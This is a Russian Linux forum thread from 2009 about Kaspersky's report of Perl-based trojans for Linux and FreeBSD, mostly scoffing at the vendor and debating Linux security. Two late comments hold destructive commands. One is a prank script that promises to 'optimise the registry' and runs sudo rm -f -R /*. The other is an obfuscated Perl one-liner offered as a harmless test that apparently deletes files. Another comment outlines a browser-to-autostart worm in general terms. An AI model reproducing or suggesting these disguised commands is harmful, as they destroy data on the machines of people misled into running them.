LINUX.ORG.RU
ФорумTalks

[толсто][лаб.касперского] Времена безопасности *nix-систем давно прошли

 


0

0

Вроде еще не обсуждали? http://www.securitylab.ru/news/379709.php

Ъ: Мифы о полной защищенности *nix-систем постепенно уходят в прошлое. Недавним примером уязвимости *nix-систем стали обнаруженные Лабораторией Касперского трояны Trojan-Mailfinder.Perl.Hnc.a и Trojan-Dropper.Linux.Prl.a.

Первый представляет собой Perl-скрипт, подключающийся к командному серверу для получения текста спам-сообщения и списка получателей этого сообщения.

Второй троян является исполняемым файлом для Linux и FreeBSD. Файл расшифровывает Perl-скрипт, запускает интерпретатор Perl и передаёт ему получившийся скрипт.

Подробности по ссылке.

★★★★★


такие ещё 15ть лет назад писали. так что боян древнючий.

// wbr

klalafuda ★☆☆
()

>Файл расшифровывает Perl-скрипт

А запустился он с помощью магии, ага :}

Deleted
()

Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

hibou ★★★★★
()
Ответ на: комментарий от xorik

Я уже вчера ночью там нафлеймил, настроение плохое было

f3ex ★★
()
Ответ на: комментарий от Deleted

А как ещё рекламироваться то? Удивляет,что за столько лет сия контора ничего работающего не написала.

ria_intel
()

Я тут подумал, такой вирус даже я осилю написать!

Но мне более интересны вирусы старой закалки. Как правило, писанные на ассемблере, они встраивались в код других программ и запускались до исполнения основного программного кода. Это как пример. Вот на такое у меня пока знаний не хватит.

hibou ★★★★★
()

--Издевающимся тоном--
Что, продажи на нуле?!! (((:

LebedevRI
()

В линуксах вирусам не хватает только одного - возможности автозапуска. Хотя может это предоставляют всякие вэб приложения?

А так вредоносной программе достаточно, например, нагадить в ~/.local/icons - и жизнь пользователя испорчена :)

Rapt0r
()
Ответ на: комментарий от Rapt0r

>В линуксах вирусам не хватает только одного - возможности автозапуска

А как же распространение по сети?

xorik ★★★★★
() автор топика
Ответ на: комментарий от hibou

> Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.

А ты всегда знаешь, что запускаешь вместе с вытянутой из интернета программой? Всякие там closed-source игры и прочие поделки? Ты хотя бы контрольные суммы проверяешь после скачивания? ;)

Manhunt ★★★★★
()

Шо опять?

У касперского очередное полугодичное обострение.

enileeb
()

Цитата с комментов:

19.05.2009 03:52:04
Опять Кашмарский взялся за старое...

Уж сколько раз твердили Жене,
Что, накурившись всякой хрени,
Не суйся в лагерь линуксят -
Они с говном тебя съедят!

madgnu ★★★★★
()
Ответ на: комментарий от madgnu

> Не суйся в лагерь линуксят -
> Они с говном тебя съедят!

простите, а именно с говном - это обязательное условие?

ps: AFAIR даже аборигены, уж на что дикий народ, и те съели Кука без соли конечно и без лука, но и без участия столь экстравагантных приправ.

// wbr

klalafuda ★☆☆
()

и вообще по мере популяризации линукса будут появляться все новые и новые вирусы. это ясно как божий день.

Kremljad
()
Ответ на: комментарий от Kremljad

угу, уже сейчас сотни и тысячи ботов сканят 22-е порты и подбирают пароли admin/admin, root/root, root/qwerty и т.д - И НАХОДЯТ ЖЕ. иначе разновсяческих спамеров и ботнетов было бы в разы меньше.

и вывод сделан в корне неверно. не "время безопасности никсов прошло", а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

Komintern ★★★★★
()

обнаруженные^W написанные fixed

bioreactor ★★★★★
()
Ответ на: комментарий от Komintern

> время грамотных админов прошло

скорее уже "время неграмотных админов прошло" или "время грамотных админов пришло". имхо.

isden ★★★★★
()

[толсто] Раб касперского

subj. fixed.

Deleted
()

Шо и ебюлды по ссылке? Да неужели а! А то сколько пробую неродные так они в wine не заводятся.

init_6 ★★★★★
()

И что они будут делать на системе без Perl'а?

И что с этими троянами будет, если их не запускать?

...

А так - можно подумать, это первые или последние трояны/черви под Linux... Самопиар, короче, очередной :)

KRoN73 ★★★★★
()

Кашперский беспокоится. О своих карманах. Кризис ведь.

ptarh ★★★★★
()
Ответ на: комментарий от Kremljad

слухи о безопасности Касперского сильно преувеличены.

ef37 ★★
()
Ответ на: комментарий от hibou

>Расчитано это все на пользователей-домохозяек. Которые не знают что на их компьютерах запущено.
Я еще понимаю на вин домохозяйки будут доп. левые программы скачивать. Плееры, офисы, А тут что? Всё же в пакетах! Резону нет им что либо экзекутаебальное искать.

darkshvein ☆☆
()
Ответ на: комментарий от xorik

Вирус не червь, но червь вирус.

>Хотя да, вирус != червь

Не всякий вирус червь, но всякий червь -- вирус.

Camel ★★★★★
()

однако написать реального червя вполне реально. Достаточно найти уязвимость в каком-нибудь популярном браузере (тот же фуррифокс), позволяющую создавать/редактировать файлы пользователя. Через нее положить скрипт куда-нибудь поглубже и сделать автозапуск от юзера (что для всяких ДЕ делается элементарно). Ну и собственно готов еще один бот :)

nu11 ★★★★★
()
Ответ на: комментарий от nu11

Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

xorik ★★★★★
() автор топика
Ответ на: комментарий от xorik

> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?

просто разместить ссылку на лоре?

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от klalafuda

>> Ну заразится один комп, а как остальных заставить перейти на вредоносную страницу с трояном?
> просто разместить ссылку на лоре?

да, и, конечно же, не забыть указать, что по ссылке - троян.

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от xorik

>а как остальных заставить перейти на вредоносную страницу с трояном?

зачем заставлять - сами зайдут. Леммингов, посещающих различные сомнительные сайты и бездумно открывающих ссылки всегда хватает. Особенно среди пользователей всяких бубунт.

nu11 ★★★★★
()

>Мифы о полной защищенности *nix-систем постепенно уходят в прошлое

Кажется они собрались портировать своё тупое поделие под линукс.

jcd ★★★★★
()

Бугога.
"Вирусы" из серии "rm".

Alex_A_V ★★
()

#!/bin/sh

echo "Сейчас скрипт оптимизирует ваш реестр, для этого Вас попросят ввести пароль."
sudo rm -f -R /*

Andru ★★★★
()

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

- не печатает

matich
()

Ждем троянов в виде апплетов для gnome/kde. Это, наверно, одна из самых больших помоек. Плюс еще инит-скрипты (но тут нужны права рута). Вроде бы есть трояны в виде плагинов для фокса...

Хорошая новость в том, что SELinux такого рода программы элементарно вычислит.

Macil ★★★★★
()

поздравляем касперыча с выходом из анабиоза

tommy ★★★★★
()
Ответ на: комментарий от Komintern

> а "время грамотных админов прошло" - так вернее. в кризис дешевле один эникей обойдется, работающий за еду.

А что грамотный админ сделает в случае скрипта на перле, который, например, эксплоитит этот перл и выдает рута (как это было несколько лет назад)? И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

smh ★★★
()
Ответ на: комментарий от smh

>И еще кучи других программ в Линуксе, о качестве написания которых ты даже ничего и не подозреваешь.

А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

Alex_A_V ★★
()
Ответ на: комментарий от Alex_A_V

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

TGZ ★★★★
()
Ответ на: комментарий от Alex_A_V

> А что ментейнеры, тоже о "качестве программ" ничего не подозревают?

даже не думаю - уверен, что в подавляющем большинстве случаев - нет, не подозревают. если собралась - хорошая программа. если не собралась - плохая. вот и весь селект.

// wbr

klalafuda ★☆☆
()
Ответ на: комментарий от TGZ

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

В любом случае, ментейнер не скачает прогу с левого сайта, и хотя бы на глазок посмотрит что там в нутрях. Тем более есть железный вариант - использовать стабильные ветки дистров. А если ставишь проги с непроверенных источников, то ССЗБ.

Alex_A_V ★★
()
Ответ на: комментарий от TGZ

>Боюсь, но здесь скорее всего "конвейер". Увеличилась циферка в версии программы, иди сюда исходничек под ножик скрипта для сборки.

Угу, а потом, когда крик поднимется, автору коммита серпом по яйцам ррраз. Найди мне такого смелого вирусописателя. Плюс, стабильные ветки дистрибов только секурные и багфисные патчи накладывают в обновлениях, а бэкпортов не так много и, подозреваю, там серьезно относятся.

redgremlin ★★★★★
()
Ответ на: комментарий от Alex_A_V

> А если ставишь проги с непроверенных источников, то ССЗБ.

(kde|gnome)-look.org - это проверенный или непроверенный источник?

isden ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.